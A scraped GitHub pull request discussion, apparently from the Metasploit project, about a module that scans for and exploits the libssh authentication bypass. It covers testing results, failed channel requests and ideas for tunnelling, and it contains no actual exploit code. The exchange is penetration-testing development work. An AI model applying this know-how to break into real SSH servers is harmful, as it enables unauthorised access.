-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add libssh authentication bypass scanner/"exploit" #10820
Conversation
So you have shell/master channel but can't portfwd and such...? Digging in the ruby Net::SSH code, as i recall something similar happening a long time ago when refactoring the old "forked up" code we used to use. For real-world application, ping @timwr: looks like the majority of targets out there are mobile devices, and that's just on port 22, so probably rooted. Thanks @wvu-r7 Edit: so looking through net/ssh/authentication/methods/*rb, the #authenticate methods actually call #authenticate_with which calls session.next_message at least once. Might want to try and step the authenticate process along by pulling the next message from the server during the auth "process." I'll look more after work this evening |
@sempervictus: I've been updating the PR description to respond to your questions. Thanks! |
Hmm, looks like i dont get GH emails when the edits occur, pardon. |
Roger that, thank you. Please see the referenced PR. I will be rebasing this one. |
Awesome, the PTY thing is beautiful :) |
@sempervictus: You linked to software using libssh2. They are separate libraries. |
oh jeez, thanks for catching that. |
I think we're spending more time writing libssh server code than exploiting it. 😅 |
Love how much GH accelerates this process - another example |
The example https://github.com/blacknbunny/libSSH-Authentication-Bypass above seems to have very similar issues to those observed in our testing. |
Any idea how I can find/setup an Android device that is vulnerable to this? |
There's https://tmate.io/ Interestingly, the static builds have not been updated since 2016: https://github.com/tmate-io/tmate/releases/tag/2.2.1 |
For the record, one of us tested tmate and ended up as a jailed nobody, so I think that's out. |
Rebasing to obtain #10833. |
Any thoughts to just getting a tunnel out of the exploit instead of a shell? Having a dynamic SOCKS5 tunnel could be VERY useful. Not sure if that's an option with the bypass or not |
The channels we can't evoke right now are actually instantiated (at least in ruby) for those transports. 100% agree tho (hence metassh back in the day). |
Probably good as a follow up. Would like to get this in tree to start with though. |
@mubix:
Now that I've "fixed" tl;dr If you can truly bypass auth and hit the right code paths to get to the right callbacks, you can open channels to your heart's content, including forwarding/tunneling. |
Release NotesThe |
Checking for patched versions was missed in this PR and added in #10835. Please update once that lands. Thank you. |
Looks like I figured out how to get SSH command output out of Metasploit. Please update when #10855 lands. Thanks. |
WIP (for those copying the module source)Use Git. :)Please apply the supplied
ssh_server_fork.patch
to get RCE out of libsshNew hotness above, old and busted below
This does in fact bypass authentication, and I can open a
session
channel, but I can't coerce any channel requests thereafter. I have tried numerous combinations ofUSERAUTH_{REQUEST,SUCCESS}
with everyCHANNEL_{OPEN,REQUEST}
, including modifying OpenSSH to send the desired packets. Note that theUSERAUTH_SUCCESS
is sent OOB and in the opposite direction, so the server won't reply.Update: this appears to work against https://git.libssh.org/projects/libssh.git/tree/examples/samplesshd-cb.c?h=libssh-0.8.3, but the callbacks are nothing more than print statements.
tl;dr We can bypass auth and even detect the vuln but can't get a shell against known code yet.
Failed testing against https://git.libssh.org/projects/libssh.git/tree/examples/ssh_server_fork.c?h=libssh-0.8.3 above. I also tested this strange piece of software: http://www.maxum.com/Rumpus/. Only the SFTP subsystem is exposed... and that channel request also fails.
In summary, it appears the example servers are incomplete, and while the auth bypass works, we can't get a real shell against any of the examples. The jury is still out on software using this library in a server capacity.